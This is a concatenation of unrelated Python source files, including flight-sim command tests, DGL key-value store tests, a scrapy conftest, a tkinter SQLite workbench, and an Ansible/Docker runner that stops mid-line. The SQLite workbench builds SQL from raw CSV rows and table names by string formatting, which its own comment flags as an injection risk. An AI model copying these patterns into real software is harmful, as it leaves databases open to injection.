self._assertCommand(self.commandProcessor.parseCommand('landing light on'), 'LANDING_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('landing light off'), 'LANDING_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('landing lights on'), 'LANDING_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('landing lights off'), 'LANDING_LIGHTS', 0) def test_support_TAXI_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('taxi lights off'), 'TAXI_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('taxi lights on'), 'TAXI_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('taxi light off'), 'TAXI_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('taxi light on'), 'TAXI_LIGHTS', 1) def test_support_NAV_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('navigation lights off'), 'NAV_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('navigation lights on'), 'NAV_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('navigation light off'), 'NAV_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('navigation light on'), 'NAV_LIGHTS', 1) def test_support_STROBE_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('strobe lights off'), 'STROBE_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('strobe lights on'), 'STROBE_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('strobe light off'), 'STROBE_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('strobe light on'), 'STROBE_LIGHTS', 1) def test_support_BEACON_LIGHTS_command(self): self._assertCommand(self.commandProcessor.parseCommand('beacon lights off'), 'BEACON_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('beacon lights on'), 'BEACON_LIGHTS', 1) self._assertCommand(self.commandProcessor.parseCommand('beacon light off'), 'BEACON_LIGHTS', 0) self._assertCommand(self.commandProcessor.parseCommand('beacon light on'), 'BEACON_LIGHTS', 1) import logging as logging_module import os # From metrickeep/core/settings.py to metrickeep/ cwd = os.path.abspath(os.path.dirname(__file__)) PROJECT_ROOT = os.path.abspath(os.path.join(cwd, os.pardir)) # logging # ------- logging = { 'format': '%(asctime)s | [%(levelname)s] %(message)s', 'level': 'INFO', } logging_module.basicConfig(**logging) logger = logging_module.getLogger(__name__) # whisper # ------- whisper_path = os.path.join(PROJECT_ROOT, "whispers") whisper_archives = "10s:24h,1m:7d,5m:3y" whisper_xfilesfactor = 0.0 whisper_aggregation = "average" drift_epsilon = 2 # seconds 1-10 # EASY MULTIPLE for _ in range(int(input())): n = int(input())-1 if n<3: print('0') continue elif n<5: print('3') continue t3 = n//3 t5 = n//5 t15 = n//15 t3l = t3*3 t5l = t5*5 t15l = t15*15 res3 = (t3*(3+t3l))//2 res5 = (t5*(5+t5l))//2 res15 = (t15*(15+t15l))//2 fres = int(res3+res5-res15) print(fres) conftest.py from pathlib import Path import pytest def _py_files(folder): return (str(p) for p in Path(folder).rglob('*.py')) collect_ignore = [ # not a test, but looks like a test "scrapy/utils/testsite.py", # contains scripts to be run by tests/test_crawler.py::CrawlerProcessSubprocess *_py_files("tests/CrawlerProcess") ] for line in open('tests/ignores.txt'): file_path = line.strip() if file_path and file_path[0] != '#': collect_ignore.append(file_path) @pytest.fixture() def chdir(tmpdir): """Change to pytest-provided temporary directory""" tmpdir.chdir() def pytest_collection_modifyitems(session, config, items): # Avoid executing tests when executing `--flake8` flag (pytest-flake8) try: from pytest_flake8 import Flake8Item if config.getoption('--flake8'): items[:] = [item for item in items if isinstance(item, Flake8Item)] except ImportError: pass saidulislam/siapp-python-crud-template0 from lib.flask_mailplus import send_template_message from siapp.app import create_celery_app celery = create_celery_app() @celery.task() def deliver_contact_email(email, message): """ Send a contact e-mail. :param email: E-mail address of the visitor :type user_id: str :param message: E-mail message :type user_id: str :return: None """ ctx = {'email': email, 'message': message} send_template_message(subject='[siapp] Contact', sender=email, recipients=[celery.conf.get('MAIL_USERNAME')], reply_to=email, template='contact/mail/index', ctx=ctx) return None pranaygarg/HMS-RV from django.db.models import Q from rest_framework import generics, mixins from .models import Student,Hostelite from .serializers import StudentSerializer,HosteliteSerializer class StudentAPIView(generics.RetrieveAPIView): #detailview createview formview lookup_field = 'usn' #slug, id# (r'?P\d+') serializer_class = StudentSerializer #queryset = BlogPost.objects.all() def get_queryset(self): return Student.objects.all() # def get_object(self): # id = self.kwargs.get("id") # return Student.objects.get(usn = id) class HosteliteAPIView(generics.RetrieveAPIView): #detailview createview formview lookup_field = 'usn' #slug, id# (r'?P\d+') serializer_class = HosteliteSerializer def get_queryset(self): return Hostelite.objects.all()import os import time import numpy as np import socket from scipy import sparse as spsp import dgl import backend as F import unittest from dgl.graph_index import create_graph_index import multiprocessing as mp from numpy.testing import assert_array_equal if os.name != 'nt': import fcntl import struct def get_local_usable_addr(): """Get local usable IP and port Returns ------- str IP address, e.g., '192.168.8.12:50051' """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable sock.connect(('10.255.255.255', 1)) ip_addr = sock.getsockname()[0] except ValueError: ip_addr = '127.0.0.1' finally: sock.close() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("", 0)) sock.listen(1) port = sock.getsockname()[1] sock.close() return ip_addr + ' ' + str(port) # Create an one-part Graph node_map = F.tensor([0,0,0,0,0,0], F.int64) edge_map = F.tensor([0,0,0,0,0,0,0], F.int64) global_nid = F.tensor([0,1,2,3,4,5], F.int64) global_eid = F.tensor([0,1,2,3,4,5,6], F.int64) g = dgl.DGLGraph() g.add_nodes(6) g.add_edges(0, 1) # 0 g.add_edges(0, 2) # 1 g.add_edges(0, 3) # 2 g.add_edges(2, 3) # 3 g.add_edges(1, 1) # 4 g.add_edges(0, 4) # 5 g.add_edges(2, 5) # 6 g.ndata[dgl.NID] = global_nid g.edata[dgl.EID] = global_eid gpb = dgl.distributed.graph_partition_book.BasicPartitionBook(part_id=0, num_parts=1, node_map=node_map, edge_map=edge_map, part_graph=g) node_policy = dgl.distributed.PartitionPolicy(policy_str='node:_N', partition_book=gpb) edge_policy = dgl.distributed.PartitionPolicy(policy_str='edge:_E', partition_book=gpb) data_0 = F.tensor([[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.]], F.float32) data_0_1 = F.tensor([1.,2.,3.,4.,5.,6.], F.float32) data_0_2 = F.tensor([1,2,3,4,5,6], F.int32) data_0_3 = F.tensor([1,2,3,4,5,6], F.int64) data_1 = F.tensor([[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.]], F.float32) data_2 = F.tensor([[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.]], F.float32) def init_zero_func(shape, dtype): return F.zeros(shape, dtype, F.cpu()) def udf_push(target, name, id_tensor, data_tensor): target[name][id_tensor] = data_tensor * data_tensor def add_push(target, name, id_tensor, data_tensor): target[name][id_tensor] += data_tensor @unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet') def test_partition_policy(): assert node_policy.part_id == 0 assert edge_policy.part_id == 0 local_nid = node_policy.to_local(F.tensor([0,1,2,3,4,5])) local_eid = edge_policy.to_local(F.tensor([0,1,2,3,4,5,6])) assert_array_equal(F.asnumpy(local_nid), F.asnumpy(F.tensor([0,1,2,3,4,5], F.int64))) assert_array_equal(F.asnumpy(local_eid), F.asnumpy(F.tensor([0,1,2,3,4,5,6], F.int64))) nid_partid = node_policy.to_partid(F.tensor([0,1,2,3,4,5], F.int64)) eid_partid = edge_policy.to_partid(F.tensor([0,1,2,3,4,5,6], F.int64)) assert_array_equal(F.asnumpy(nid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0], F.int64))) assert_array_equal(F.asnumpy(eid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0,0], F.int64))) assert node_policy.get_part_size() == len(node_map) assert edge_policy.get_part_size() == len(edge_map) def start_server(server_id, num_clients, num_servers): # Init kvserver print("Sleep 5 seconds to test client re-connect.") time.sleep(5) kvserver = dgl.distributed.KVServer(server_id=server_id, ip_config='kv_ip_config.txt', num_servers=num_servers, num_clients=num_clients) kvserver.add_part_policy(node_policy) kvserver.add_part_policy(edge_policy) if kvserver.is_backup_server(): kvserver.init_data('data_0', 'node:_N') kvserver.init_data('data_0_1', 'node:_N') kvserver.init_data('data_0_2', 'node:_N') kvserver.init_data('data_0_3', 'node:_N') else: kvserver.init_data('data_0', 'node:_N', data_0) kvserver.init_data('data_0_1', 'node:_N', data_0_1) kvserver.init_data('data_0_2', 'node:_N', data_0_2) kvserver.init_data('data_0_3', 'node:_N', data_0_3) # start server server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None) dgl.distributed.start_server(server_id=server_id, ip_config='kv_ip_config.txt', num_servers=num_servers, num_clients=num_clients, server_state=server_state) def start_server_mul_role(server_id, num_clients, num_servers): # Init kvserver kvserver = dgl.distributed.KVServer(server_id=server_id, ip_config='kv_ip_mul_config.txt', num_servers=num_servers, num_clients=num_clients) kvserver.add_part_policy(node_policy) if kvserver.is_backup_server(): kvserver.init_data('data_0', 'node:_N') else: kvserver.init_data('data_0', 'node:_N', data_0) # start server server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None) dgl.distributed.start_server(server_id=server_id, ip_config='kv_ip_mul_config.txt', num_servers=num_servers, num_clients=num_clients, server_state=server_state) def start_client(num_clients, num_servers): os.environ['DGL_DIST_MODE'] = 'distributed' # Note: connect to server first ! dgl.distributed.initialize(ip_config='kv_ip_config.txt') # Init kvclient kvclient = dgl.distributed.KVClient(ip_config='kv_ip_config.txt', num_servers=num_servers) kvclient.map_shared_data(partition_book=gpb) assert dgl.distributed.get_num_client() == num_clients kvclient.init_data(name='data_1', shape=F.shape(data_1), dtype=F.dtype(data_1), part_policy=edge_policy, init_func=init_zero_func) kvclient.init_data(name='data_2', shape=F.shape(data_2), dtype=F.dtype(data_2), part_policy=node_policy, init_func=init_zero_func) # Test data_name_list name_list = kvclient.data_name_list() print(name_list) assert 'data_0' in name_list assert 'data_0_1' in name_list assert 'data_0_2' in name_list assert 'data_0_3' in name_list assert 'data_1' in name_list assert 'data_2' in name_list # Test get_meta_data meta = kvclient.get_data_meta('data_0') dtype, shape, policy = meta assert dtype == F.dtype(data_0) assert shape == F.shape(data_0) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_0_1') dtype, shape, policy = meta assert dtype == F.dtype(data_0_1) assert shape == F.shape(data_0_1) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_0_2') dtype, shape, policy = meta assert dtype == F.dtype(data_0_2) assert shape == F.shape(data_0_2) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_0_3') dtype, shape, policy = meta assert dtype == F.dtype(data_0_3) assert shape == F.shape(data_0_3) assert policy.policy_str == 'node:_N' meta = kvclient.get_data_meta('data_1') dtype, shape, policy = meta assert dtype == F.dtype(data_1) assert shape == F.shape(data_1) assert policy.policy_str == 'edge:_E' meta = kvclient.get_data_meta('data_2') dtype, shape, policy = meta assert dtype == F.dtype(data_2) assert shape == F.shape(data_2) assert policy.policy_str == 'node:_N' # Test push and pull id_tensor = F.tensor([0,2,4], F.int64) data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32) kvclient.push(name='data_0', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_1', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_2', id_tensor=id_tensor, data_tensor=data_tensor) res = kvclient.pull(name='data_0', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_1', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_2', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) # Register new push handler kvclient.register_push_handler('data_0', udf_push) kvclient.register_push_handler('data_1', udf_push) kvclient.register_push_handler('data_2', udf_push) # Test push and pull kvclient.push(name='data_0', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_1', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.push(name='data_2', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.barrier() data_tensor = data_tensor * data_tensor res = kvclient.pull(name='data_0', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_1', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) res = kvclient.pull(name='data_2', id_tensor=id_tensor) assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) # Test delete data kvclient.delete_data('data_0') kvclient.delete_data('data_1') kvclient.delete_data('data_2') # Register new push handler kvclient.init_data(name='data_3', shape=F.shape(data_2), dtype=F.dtype(data_2), part_policy=node_policy, init_func=init_zero_func) kvclient.register_push_handler('data_3', add_push) data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32) kvclient.barrier() time.sleep(kvclient.client_id + 1) print("add...") kvclient.push(name='data_3', id_tensor=id_tensor, data_tensor=data_tensor) kvclient.barrier() res = kvclient.pull(name='data_3', id_tensor=id_tensor) data_tensor = data_tensor * num_clients assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor)) def start_client_mul_role(i): os.environ['DGL_DIST_MODE'] = 'distributed' # Initialize creates kvstore ! dgl.distributed.initialize(ip_config='kv_ip_mul_config.txt') if i == 0: # block one trainer time.sleep(5) kvclient = dgl.distributed.kvstore.get_kvstore() kvclient.barrier() print("i: %d role: %s" % (i, kvclient.role)) assert dgl.distributed.role.get_num_trainers() == 2 assert dgl.distributed.role.get_trainer_rank() < 2 print('trainer rank: %d, global rank: %d' % (dgl.distributed.role.get_trainer_rank(), dgl.distributed.role.get_global_rank())) dgl.distributed.exit_client() @unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet') def test_kv_store(): ip_config = open("kv_ip_config.txt", "w") num_servers = 2 num_clients = 2 ip_addr = get_local_usable_addr() ip_config.write('{}\n'.format(ip_addr)) ip_config.close() ctx = mp.get_context('spawn') pserver_list = [] pclient_list = [] os.environ['DGL_NUM_SERVER'] = str(num_servers) for i in range(num_servers): pserver = ctx.Process(target=start_server, args=(i, num_clients, num_servers)) pserver.start() pserver_list.append(pserver) for i in range(num_clients): pclient = ctx.Process(target=start_client, args=(num_clients, num_servers)) pclient.start() pclient_list.append(pclient) for i in range(num_clients): pclient_list[i].join() for i in range(num_servers): pserver_list[i].join() @unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Do not support windows and TF yet') def test_kv_multi_role(): ip_config = open("kv_ip_mul_config.txt", "w") num_servers = 2 num_trainers = 2 num_samplers = 2 # There are two trainer processes and each trainer process has two sampler processes. num_clients = num_trainers * (1 + num_samplers) ip_addr = get_local_usable_addr() ip_config.write('{}\n'.format(ip_addr)) ip_config.close() ctx = mp.get_context('spawn') pserver_list = [] pclient_list = [] os.environ['DGL_NUM_SAMPLER'] = str(num_samplers) os.environ['DGL_NUM_SERVER'] = str(num_servers) for i in range(num_servers): pserver = ctx.Process(target=start_server_mul_role, args=(i, num_clients, num_servers)) pserver.start() pserver_list.append(pserver) for i in range(num_trainers): pclient = ctx.Process(target=start_client_mul_role, args=(i,)) pclient.start() pclient_list.append(pclient) for i in range(num_trainers): pclient_list[i].join() for i in range(num_servers): pserver_list[i].join() if __name__ == '__main__': test_partition_policy() test_kv_store() test_kv_multi_role() #!/usr/bin/env python """ RST formatter for REDbot. """ __author__ = " <>" __copyright__ = """\ Copyright (c) 2008-2010 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ ### FIXME: This code is NOT yet converted to the new Formatter. class RstOutputFormatter(object): msg_categories = [ rs.c.GENERAL, rs.c.CONNECTION, rs.c.CONNEG, rs.c.CACHING, rs.c.VALIDATION, rs.c.RANGE ] def __init__(self, red): self.red = red def print_headers(self): print "HTTP/%s %s %s" % (self.red.res_version, self.red.res_status, self.red.res_phrase) print "Response headers" print "----------------" print "" print "::" print "" print nl.join([ "\t%s:%s" % header for header in self.red.res_hdrs]) #declaring flag definitions print RstOutputFormatter.flag_definition() def print_recommendations(self): print "" nl.join([str(self.print_recommendation(str(category))) for category in self.msg_categories]) def print_recommendation(self, category): messages = [msg for msg in self.red.messages if msg.category == category] if not messages: return nl out = [] if [msg for msg in messages]: out.append("%s:\n" % category) for m in messages: out.append( "- %s" % (self.flagize(m.level, m.summary["en"] % m.vars)) ) smsgs = [msg for msg in getattr(m.subrequest, "messages", []) if msg.level in [rs.l.BAD]] if smsgs: out.append("") for sm in smsgs: out.append( "%s" % (self.flagize(sm.level, sm.summary["en"] % sm.vars)) ) out.append("") out.append("") print nl.join(out) def flagize(self, level, string): # info flag = "|flag-info|" if level == "good": flag = "|flag-good|" if level == "bad": flag = "|flag-bad|" if level == "warning": flag = "|flag-warning|" return flag + " " + string @staticmethod def flag_definition(): flag_dir = "web/icon/" flag_definition_list = { "good":"accept1.png", "bad":"remove-16.png", "warning":"yellowflag1.png", "info":"infomation-16.png" } out = [] out.append("") for flag, icon in flag_definition_list.items(): out.append(".. |flag-" + flag + "| image:: " + flag_dir + icon + nl + " :width: 16px") return nl.join(out) # # import sqlite3 as sqldb from Moggs import * from tkinter import filedialog import os import shutil import sys import glob import pprint class Workbench(Tk): def __init__(self): Tk.__init__(self) self.title("SQL Workbench") # toolbar self.toolbar = Buttonbox(self) self.toolbar.add("SQL Pad", command=self.sqlPad) self.toolbar.add("Exit", command=self.exit) self.toolbar.alignbuttons() self.toolbar.pack(side = "top", fill = "x", expand = "no") # main frame mainFrame = Frame(self) mainFrame.pack(side = "top", fill = "both", expand = "yes", padx=4) # left frame lFrame = Frame(mainFrame) lFrame.pack(side = "left", fill = "y", expand = "no", padx=4) # middle frame mFrame = Frame(mainFrame) mFrame.pack(side = "left", fill = "both", expand = "yes", padx=4) # right frame rFrame = Frame(mainFrame) rFrame.pack(side = "left", fill = "y", expand = "no", padx=4) b = Button(rFrame, text = "New Table", command=self.newTable) b.pack() b = Button(rFrame, text = "Edit Table", command=self.editTable) b.pack() b = Button(rFrame, text = "Drop Table", command=self.dropTable) b.pack() b = Button(rFrame, text = "Load Data", command=self.loadData) b.pack() b = Button(rFrame, text = "View Data", command=self.viewData) b.pack() # status bar self.statusBar = LabelEntry(self) self.statusBar.pack(side = "top", fill = "x", expand = "no") # connection manager self.connectionManager = ConnectionManager(lFrame, parent=self) self.connectionManager.pack(side = "top", fill = "both", expand = "yes") # work area self.workArea = ScrolledCanvas(mFrame) self.workArea.pack(side = "top", fill = "both", expand = "yes") self.workArea.oldactive = None ## which object is selected def sqlPad(self): if self.connection: pad = SQLScratchPad(self.connection) def clearWorkArea(self): """remove all items from canvas!""" self.workArea.delete("all") def listTables(self): self.clearWorkArea() sql = "SELECT name FROM sqlite_master WHERE type='table';" tables = self.executeFetchall(sql) self.populateWorkArea(tables) def populateWorkArea(self, tables): Y = 10 X = 10 W = 50 H = 70 for row in tables: tableName = row[0] # create table object tab = Table(self.workArea, tableName, X, Y, W, H) # arrange them all x1, y1, x2, y2 = self.workArea.bbox("all") X = X + W + 15 if X >= 600: X = 10 Y = y2 + 2 self.workArea.tag_bind(tableName, "<1>", TagBinder(self.workArea, tableName)) def dropTable(self): # get table name for selected table if self.workArea.oldactive: tn = self.workArea.oldactive sql = "drop table %s" %tn self.execute(sql) self.commit() self.workArea.oldactive = None self.listTables() def editTable(self): """show the table editor""" # get table name & description for 'active' / selected table if self.workArea.oldactive: tn = self.workArea.oldactive sql = "PRAGMA table_info([%s])" %tn td = self.executeFetchall(sql) te = TableEditor(self, tableName=tn, tableDesc=td) def newTable(self): """show the table editor""" te = TableEditor(self) def exit(self): """Close the main window and withdraw it (clean up)""" self.quit() self.withdraw() def execute(self, sql): cur = self.connection.cursor() cur.execute(sql) def executeFetchall(self, sql): cur = self.connection.cursor() cur.execute(sql) return cur.fetchall() def commit(self): self.connection.commit() def viewData(self): if self.workArea.oldactive: tn = self.workArea.oldactive sql = "PRAGMA table_info([%s])" %tn tdesc = self.executeFetchall(sql) sql = "select * from %s" %(tn) tdata = self.executeFetchall(sql) DataEditor(self, tableName=tn, tableDesc = tdesc, tableData = tdata) def loadData(self): ## load the data from a csv file into selected table ## data MUST match table & be in correct column order! if self.workArea.oldactive: tn = self.workArea.oldactive filename = filedialog.askopenfilename() if filename: fin = open(filename) for row in fin: #~ row_data = eval(line) ## SUPER DANGEROUS, SERIOUSLY! ## SQL INJECTION ATTACK WAITING TO HAPPEN sql = "insert into %s values (%s)" %(tn, row) print(sql) self.execute(sql) self.commit() class ConnectionManager(Frame): def __init__(self, cont, parent=None): Frame.__init__(self, cont) self.parent = parent l = Label(self, text = "Choose Connection:") l.pack(fill = "x") self.databaseName = LabelCombobox(self, text = "Database Name") self.databaseName.pack(fill = "x") # testing self.databaseName.set("moggs.dbf") b = Button(self, text = "Connect", command = self.connect) b.pack() # populate databaeName self.populateDatabaseName() def connect(self): self.parent.statusBar.set("") self.backupDatabase() try: self.connection = sqldb.connect(self.databaseName.get()) except Exception as ex: self.parent.statusBar.set("%s" %str(ex)) else: self.parent.connection = self.connection # fudge? self.parent.statusBar.set("Connected to %s" %self.databaseName.get()) self.parent.listTables() def populateDatabaseName(self): filenames = glob.glob("*.dbf") filenames.sort() self.databaseName.setlist(filenames) def backupDatabase(self): dbname = self.databaseName.get() shutil.copyfile(dbname, dbname.replace(".dbf", ".bak")) class DataEditor(Toplevel): def __init__(self, parent=None, tableName="", tableDesc=None, tableData=None): Toplevel.__init__(self) self.title("Data Viewer Table : %s" %tableName) self.parent = parent bb = Buttonbox(self) bb.add("Close", command=self.withdraw) bb.alignbuttons() bb.pack(fill="x") self.dataEditor = ScrolledTreeview(self, show="headings") self.dataEditor.pack(fill="both", expand="yes") cols = [] for row in tableDesc: cols.append(row[1]) self.dataEditor["columns"] = cols for col in cols: self.dataEditor.heading(col, text=col) for row in tableData: #~ print(row) self.dataEditor.insert("", "end", values=row) class TableEditor(Toplevel): def __init__(self, parent=None, tableName="", tableDesc=None): Toplevel.__init__(self) self.title("Edit Table : %s" %tableName) self.parent = parent self.tableColumns = [] # toolbar bb = Buttonbox(self) bb.add("Add", command=self.addRow) bb.add("Save", command=self.saveTable) bb.pack(fill="x") # table name self.tableName = LabelEntry(self, text = "Table Name") self.tableName.set(tableName) self.tableName.pack(fill = "x") # load in the table description create a row per column # populate the rows with the table description # unless new table (tableData=None) in which case # create one empty row if tableDesc: for col in tableDesc: row = TableColumn(self) self.tableColumns.append(row) row.pack() row.colName.set(col[1]) row.dataType.set(col[2]) null = col[3] dflt = col[4] pk = col[5] if pk: row.dataConst.set("PRIMARY KEY") else: if null: row.dataConst.set("NOT NULL") else: row = TableColumn(self) self.tableColumns.append(row) row.pack() def saveTable(self): # drop the table first (very destructive!) sql = "drop table %s" %(self.tableName.get()) #~ print(sql) try: self.parent.execute(sql) self.parent.commit() except: pass # really...? # construct the create table sql sql = """create table %s (""" %(self.tableName.get()) for row in self.tableColumns: sql = sql + row.getSQL() sql = sql + "," sql = sql[:-1] + ")" #~ print(sql) self.parent.execute(sql) self.parent.commit() self.parent.listTables() self.withdraw() def addRow(self): row = TableColumn(self) self.tableColumns.append(row) row.pack() def deleteRow(self): pass class TableColumn(Frame): def __init__(self, parent): Frame.__init__(self, parent) # column name self.colName = LabelEntry(self, text = "Column Name") self.colName.pack(side = "left") # column data type self.dataType = LabelCombobox(self, text = "Data Type") self.dataType.setlist(["INTEGER", "REAL", "TEXT", "BLOB"]) self.dataType.pack(side = "left") # column constraints, PRIMARY KEY implies NOT NULL & UNIQUE self.dataConst = LabelCombobox(self, text = "Constraints") self.dataConst.setlist(["", "PRIMARY KEY", "UNIQUE", "NOT NULL", "UNIQUE, NOT NULL"]) self.dataConst.pack(side = "left") def getSQL(self): cn = self.colName.get() dt = self.dataType.get() dc = self.dataConst.get() if dc: return "%s %s %s" %(cn, dt, dc) else: return "%s %s" %(cn, dt) class Table: """object on canvas that represents a database table""" def __init__(self, canvas, tableName, X, Y, W, H): self.canvas = canvas self.name = tableName self.canvas.create_polygon( (X, Y), (X+W-10, Y), # chopped (X+W, Y+H-60), # corner (X+W, Y+H), (X, Y+H), (X, Y), fill = "white", outline = "black", width = 2, tags = tableName, ) # grid lines self.canvas.create_line(X + 5, Y + 20, X + W - 5, Y + 20, width = 2, tags=tableName) self.canvas.create_line(X + 5, Y + 30, X + W - 5, Y + 30, width = 2, tags=tableName) self.canvas.create_line(X + 5, Y + 40, X + W - 5, Y + 40, width = 2, tags=tableName) self.canvas.create_line(X + 5, Y + 50, X + W - 5, Y + 50, width = 2, tags=tableName) # grid lines self.canvas.create_line(X + 5, Y + 20, X + 5, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 15, Y + 20, X + 15, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 25, Y + 20, X + 25, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 35, Y + 20, X + 35, Y + 50, width = 2, tags=tableName) self.canvas.create_line(X + 45, Y + 20, X + 45, Y + 50, width = 2, tags=tableName) # label self.canvas.create_text(X, Y+H, anchor = "nw", text = "%s" %tableName, font = "Courier 6", tags=tableName) class TagBinder: def __init__(self, canvas, tag): self.canvas = canvas self.tag = tag def __call__(self, event): try: self.canvas.itemconfig(self.canvas.oldactive, outline="black") except: pass try: self.canvas.itemconfig(self.tag, outline="red") except: ## this is a real bad hack ## basically one of the items on the canvas does not suport "outline" ## this except catches that and stops changing colour ## happy accident means the outside shape is changed but nothing else! pass self.canvas.oldactive = self.tag class SQLScratchPad(Toplevel): def __init__(self, connection): Toplevel.__init__(self) self.title("SQL Scratch Pad") self.connection = connection l = Label(self, text = "SQL Input") l.pack(fill="x") self.sqlInput = ScrolledText(self, height=3) self.sqlInput.pack(fill="both", expand="yes") bb = Buttonbox(self) bb.add("Execute", command=self.execute) bb.add("Execute & Fetch One", command=self.executeFetchone) bb.add("Execute & Fetch All", command=self.executeFetchall) bb.add("Close", command=self.withdraw) bb.alignbuttons() bb.pack(fill="x") l = Label(self, text = "Results...") l.pack(fill="x") self.sqlOutput = ScrolledText(self) self.sqlOutput.pack(fill="both", expand="yes") def log(self, text): self.sqlOutput.insert("end", "-------------------------------------\n") self.sqlOutput.insert("end", text) self.sqlOutput.insert("end", "\n-------------------------------------\n") self.sqlOutput.see("end") def execute(self): sql = self.sqlInput.gettext() cur = self.connection.cursor() cur.execute(sql) self.log("executed") def executeFetchone(self): sql = self.sqlInput.gettext() cur = self.connection.cursor() cur.execute(sql) self.log(pprint.pformat(cur.fetchone())) def executeFetchall(self): sql = self.sqlInput.gettext() cur = self.connection.cursor() cur.execute(sql) self.log(pprint.pformat(cur.fetchall())) wb = Workbench() wb.mainloop() nembery/reference_architecture_automation1-10 import os import socket from docker import DockerClient from jinja2 import Environment, FileSystemLoader env = Environment(loader=FileSystemLoader('.')) variables = { 'p_ip': os.environ.get('Panorama_IP'), "p_serial": os.environ.get('Primary_Serial'), "p_peer": os.environ.get('Secondary_Private_IP'), "s_ip": os.environ.get('Secondary_IP'), "s_serial": os.environ.get('Secondary_Serial'), "s_peer": os.environ.get('Primary_Private_IP') } ansible_variables = "\"password="+os.environ.get('PASSWORD')+" primary_otp="+os.environ.get('OTP')+" secondary_otp="+os.environ.get('Secondary_OTP')+"\"" if os.environ.get('enable_ha') == "true": inventory_template = env.get_template('ha_inventory.txt') secondary_inventory = inventory_template.render(variables) with open("inventory.yml", "w") as fh: fh.write(secondary_inventory) else: inventory_template = env.get_template('inventory.txt') primary_inventory = inventory_template.render(variables) with open("inventory.yml", "w") as fh: fh.write(primary_inventory) client = DockerClient() container = client.containers.run('paloaltonetworks/pan-ansible', "ansible-playbook platformsettings.yml -e "+ansible_variables+" -i inventory.yml", auto_remove=True, volumes_from=socket.gethostname(), working_dir=os.getcwd(), user=os.getuid(), detach=True) # Monitor the log so that the user can see the console output during the run versus waiting until it is complete. The container stops and is removed once the run is complete and this loop will exit at that time. for line in container.logs(stream=True): print(line.decode('utf-8').strip()) # Run the appropriate Ansible playbook based on if the user selected HA or not if os.environ.get('enable_ha') == "true": container = client.containers.run('paloaltonetworks/pan-ansible', "ansible-playbook ha.yml -e "+ansible_variables+" -i inventory.yml", auto_remove=True, volumes_from=socket.gethostname(), working_dir=os.getcwd(), user=os.getuid(), detach=True) for line in container.logs(stream=True): print(line.decode('utf-8').strip()) else: container = client.containers.run('paloaltonetworks/pan-ansible', "ansible-playbook otp.yml -e 